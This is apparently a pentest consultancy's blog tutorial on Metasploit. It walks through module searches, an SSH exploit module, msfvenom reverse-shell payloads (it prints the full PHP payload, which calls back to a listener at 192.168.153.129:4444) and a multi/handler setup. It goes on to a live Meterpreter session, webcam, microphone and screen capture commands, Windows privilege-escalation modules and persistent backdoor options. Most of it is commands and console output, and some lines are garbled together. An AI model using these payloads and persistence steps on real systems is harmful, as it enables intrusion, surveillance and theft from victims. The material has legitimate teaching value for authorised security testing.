Penetration Testing Using Metasploit Framework

Metasploit Framework is a powerful open-source penetration testing framework. You get to know all the information about penetration testing, IDS signature, and software vulnerabilities. It allows the execution and development of the exploit code against a remote target tool. Metasploit is not illegal itself, but it depends on what you use it for.

Major keywords in the Metasploit framework

The module is a software application in the Metasploit framework that carries out tasks like exploiting and scanning and the targets.

They are the key components of the framework and are broken down into 7 types below:

1. Exploits
2. Payloads
3. Auxiliaries
4. Encoders
5. Evasions
6. Nops
7. Post

Payloads are the simple scripts that are often used in module exploits by taking advantage of the system’s vulnerabilities. Auxiliary modules are the only modules that are not exploited. Several interesting features allow them to do more than just exploiting.

Let’s get started…

Updating the Metasploit is always a good idea. It is recommended to check this weekly.

Fig.1

Launch the Metasploit console like this.

Fig.2

You can always seek help in the console.

Fig.3

You can search for modules based on your target.

msf6 > search cisco

Information gathering is also an important task of ethical hacking and penetration testing. Several tools seamlessly integrate with Metasploit like Nmap. Let’s test using Nmap.

Fig.4

Nmap allows you to scan a host to identify it and to find out the services it is providing. You have now an option to choose from the Exploit Database or search for modules in Metasploit with this information. Scan your local Kali instance, check that it enabled the SSH server.

Fig.5

This procedure is for “ssh” alone. Now you will get results in Metasploit.

So, if you go for the “help <command>” option, for example, you type, “help search” you will get many details regarding the use of the command. For example, you may not know that you can filter your searches as well which is explained in the help.

Fig.6

Let’s try this…

msf6 > search cve:2020 type:exploit platform:-linux ssh

Fig.7

Let’s look at how SSH exploits on the Linux 2020 platform work.

So, what does this actually do?

msf6 > info exploit/linux/ssh/ibm_drm_a3user

Fig.8

Time to exploit!

Using the Kali Linux SSH server for this example. The next step is to tell Metasploit that the Kali Linux SSH server is used for this exploit.

msf6 > use exploit/linux/ssh/ibm_drm_a3user[*] No payload configured, defaulting to cmd/unix/interactmsf6 exploit(linux/ssh/ibm_drm_a3user) >

Now, configuring the options…

Fig.9

Now, we set the various options using the “set” command.

msf6 exploit(linux/ssh/ibm_drm_a3user) > set RHOSTS localhostRHOSTS => localhost

Once the desired options are set, run “exploit” command.

msf6 exploit(linux/ssh/ibm_drm_a3user) > exploit[*] Exploiting target {:address=>”0.0.0.1″, :hostname=>”localhost”} [*] 0.0.0.1:22 – Making an attempt to log in to the IBM Data Risk Manager appliance…

In Metasploit, “search” functionality is considered to be a powerful option, but you can also find other possible ways.

What other exploit modules are available?

There are two ways of finding this out. Firstly, run the “banner” option again from the “msfconsole”.

As you can see, there are 2144 exploits, 1142 auxiliary, 365 posts, 592 payloads, 45 encoders, 10 nops, and 8 evasions at the time.

Or, go for the second option, i.e., to exit “msfconsole” and look for “modules” in the Metasploit framework directory.

Fig.10

Or, use maybe something more specific like “firefox” exploits.

kali@kali)-[~]└─$ ls -l /usr/share/metasploit-framework/modules/exploits/firefox/localtotal 4-rw-r–r– 1 kali root 1857 Jun 24 12:07 exec_shellcode.rb

This way you have to use it in Metasploit.

Fig.11

msf6 > use exploit/firefox/local/exec_shellcode[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp                                                                                                                                   msf6 exploit(firefox/local/exec_shellcode) >

What non-exploit modules are available?

An auxiliary is a non-exploit module in Metasploit which does not come with a payload, while exploits usually come with a payload. They are a feature of the framework, that allows them for multiple purposes other than exploitation. For example, let here is the Denial-of-Service (DoS) auxiliary.

Fig.12

Fig.13

And maybe more specifically Cisco DoS modules?

Fig.14

That IOS HTTP Percent module sounds interesting?

Thinking about how to exit a context.

msf6 auxiliary(dos/cisco/ios_http_percentpercent) > backmsf6 >

Reverse Shell Client (“Victim”)

Reverse shells can be quarantined and detected by the systems that have antivirus software installed in it. This should act as a warning to ensure that you keep your system(s) up to date and have virus scanner software. This is because:

“Meterpreter” is an exploit which we are going to use.

msf6 > search meterpreter

“Meterpreter” in Metasploit can create a number of platforms, that includesAvoid, Windows, Python, Apple iOS, FreeBSD, and more.

Just to list a few…

payload/python/meterpreter/reverse_tcp
payload/android/meterpreter/reverse_tcp
apple_ios/aarch64/meterpreter_reverse_tcp
java/meterpreter/reverse_tcp
linux/aarch64/meterpreter_reverse_tcp
linux/armbe/meterpreter_reverse_tcp
linux/mips64/meterpreter_reverse_tcp
linux/mipsbe/meterpreter_reverse_tcp
linux/mipsle/meterpreter/reverse_tcp
linux/mipsle/meterpreter_reverse_tcp
linux/ppc/meterpreter_reverse_tcp
linux/ppc64le/meterpreter_reverse_tcp
linux/ppce500v2/meterpreter_reverse_tcp
linux/x64/meterpreter_reverse_tcp
linux/x86/meterpreter_reverse_tcp
linux/zarch/meterpreter_reverse_tcp
osx/x64/meterpreter_reverse_tcp
php/meterpreter_reverse_tcp
python/meterpreter_reverse_tcp
windows/meterpreter_reverse_tcp
windows/x64/meterpreter_reverse_tcp

The Venom (msfvenom) documentation seems to use Windows as an example.

Fig.15

Let’s try this out using Java.

Fig.16

Or you can also choose another option like PHP.

Fig.17

In PHP, if you run Linux “cat” on the file and easily view the code it is creating in the exploit.

/*<?php /**/ error_reporting(0); $ip = ‘192.168.153.129’; $port = 4444; if (($f = ‘stream_socket_client’) && is_callable($f)) { $s = $f(“tcp://{$ip}:{$port}”); $s_type = ‘stream’; } if (!$s && ($f = ‘fsockopen’) && is_callable($f)) { $s = $f($ip, $port); $s_type = ‘stream’; } if (!$s && ($f = ‘socket_create’) && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = ‘socket’; } if (!$s_type) { die(‘no socket funcs’); } if (!$s) { die(‘no socket’); } switch ($s_type) { case ‘stream’: $len = fread($s, 4); break; case ‘socket’: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(“Nlen”, $len); $len = $a[‘len’]; $b = ”; while (strlen($b) < $len) { switch ($s_type) { case ‘stream’: $b .= fread($s, $len-strlen($b)); break; case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[‘msgsock’] = $s; $GLOBALS[‘msgsock_type’] = $s_type; if (extension_loaded(‘suhosin’) && ini_get(‘suhosin.executor.disable_eval’)) { $suhosin_bypass=create_function(”, $b); $suhosin_bypass(); } else { eval($b); } die();

It won’t be a good idea to run Java (runme.jar), PHP (runme.php), and Windows (payload.exe). It is to be run or installed on the victim’s device.

Reverse Shell Server (“Attacker”)

Now, configure and proceed with the reverse shell server.

msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcppayload => java/meterpreter/reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler):    Name  Current Setting  Required  Description   —-  —————  ——–  ———–  Payload options (java/meterpreter/reverse_tcp):    Name   Current Setting  Required  Description   —-   —————  ——–  ———–   LHOST                   yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen port  Exploit target:    Id  Name   —  —-   0   Wildcard Target msf6 exploit(multi/handler) > set LHOST 192.168.153.129LHOST => 192.168.153.129 msf6 exploit(multi/handler) > set LPORT 4444LPORT => 4444 msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler):    Name  Current Setting  Required  Description   —-  —————  ——–  ———– Payload options (java/meterpreter/reverse_tcp):    Name   Current Setting  Required  Description   —-   —————  ——–  ———–   LHOST  192.168.153.129  yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen port Exploit target:    Id  Name   —  —-   0   Wildcard Target msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.153.129:4444

So, what did we do here…?

• Generic TCP reverse shell is to be configured
• Set the payload java/meterpreter/reverse_tcp
• As you need to set, so look at the options thoroughly
• Set the LHOST and LPORT
• Checked the options are properly set
• Begin the exploit to listen on 168.1.2:4444

In another terminal, you can see that Kali is listening on TCP 4444 now.

kali@kali:~$ netstat -antup | grep :4444
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp        0      0 192.168.1.2:4444        0.0.0.0:*               LISTEN      63774/ruby

Browse for the exploit in the home directory of Kali (runme.jar) and run it by giving it execute permissions.

kali@kali:~$ chmod +x runme.jar
kali@kali:~$ ./runme.jar
kali@kali:~$

You would expect to see “runme.jar” running right?

kali@kali:~$ ps aux | grep runme
kali       63963  0.0  0.0   6112   644 pts/2    S+   22:54   0:00 grep –color=auto runme

Seems like nothing happened right? Or did it?

kali@kali:~$ lsof -i :4444
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
ruby    63774 kali    8u  IPv4 170341      0t0  TCP 192.168.1.2:4444->192.168.1.2:56226 (ESTABLISHED)
java    63940 kali    7u  IPv6 170614      0t0  TCP 192.168.1.2:56226->192.168.1.2:4444 (ESTABLISHED)

Then, check out the Metasploit console.

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Sending stage (53944 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56226) at 2020-10-15 22:53:28 +0100meterpreter >

This is the crazy part…

meterpreter > shell
Process 1 created.
Channel 1 created.ls -la ~/runme.jar
-rwxr-xr-x 1 kali kali 5307 Oct 15 22:33 /home/kali/runme.jar

Although prompt is not seen, you will have a shell back to the victim system and will locate the “runme.jar” file. Now, try creating a file or directory, and you will see it created on the victim system.

You can terminate the shell by pressing Ctrl+C.

Terminate channel 1? [y/N]  y
meterpreter >

Try to “background” the meterpreter session.

meterpreter > background

The current sessions and re-access of any sessions can be shown as mentioned below.

msf6 exploit(multi/handler) > show sessionsActive sessions
===============Id  Name  Type                    Information  Connection
—  —-  —-                    ———–  ———-
1         meterpreter java/linux  kali @ kali  192.168.1.2:4444 -> 192.168.1.2:56226 (192.168.1.2)msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1…meterpreter >

Thinking about what a hacker can do with your system with reverse shell can give you nightmares. They can easily access your web camera, microphone, take access to your system and view your private files and much more. This is the reason why it is advised to open software from trustworthy sources and to ensure that your system is up-to-date with anti-virus installed in it.

Here are just a few options…

meterpreter > helpStdapi: Networking Commands
===========================Command       Description
——-       ———–
ifconfig      Display interfaces
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing tableStdapi: System Commands
=======================Command       Description
——-       ———–
execute       Execute a command
getenv        Get one or more environment variable values
getuid        Get the user that the server is running as
localtime     Displays the target system’s local date and time
pgrep         Filter processes by name
ps            List running processes
shell         Drop into a system command shell
sysinfo       Gets information about the remote system, such as OSStdapi: User interface Commands
===============================Command       Description
——-       ———–
keyevent      Send key events
mouse         Send mouse events
screenshare   Watch the remote user’s desktop in real time
screenshot    Grab a screenshot of the interactive desktopStdapi: Webcam Commands
=======================Command       Description
——-       ———–
record_mic    Record audio from the default microphone for X secondsStdapi: Audio Output Commands
=============================Command       Description
——-       ———–
play          play a waveform audio file (.wav) on the target system

The list of options depends on what system you are accessing. If you are using the Kali Linux virtual machine, then the webcam options are missing, but if you were accessing a Windows host, for example, you would see them there.

The exploit will run as the user that ran it. You will need to escalate your services to take full access to your system.

In case, you are targeting Windows, you will have multiple options…

msf6 exploit(multi/handler) > use post/windows/escalate/
use post/windows/escalate/droplnk             use post/windows/escalate/golden_ticket       use post/windows/escalate/screen_unlock
use post/windows/escalate/getsystem           use post/windows/escalate/ms10_073_kbdlayout  use post/windows/escalate/unmarshal_cmd_exec

You could also seek permission from the victim to access the system.

msf6 exploit(multi/handler) > use exploit/windows/local/ask

Linux-based systems don’t usually have “fun” options. In case, Windows user is the target, you could have a gala time on their system.

These reverse shells are not persistent. This means if the system reboots, it won’t be running and you need to seek the victim’s permission to run it again.

meterpreter > run persistence -h[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value […]
Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on which the system running Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

As an example, for the system with Windows OS to reverse shell persistent, you have to run this.

meterpreter > run exploit/windows/local/persistence OPTION=X

You can also browse our website to learn about other pentest attacks like AWS Pentesting, Port Forwarding and more on our blog section.

Author,

Sachin Kumar

Attack & Pentest Team,

Varutra Consulting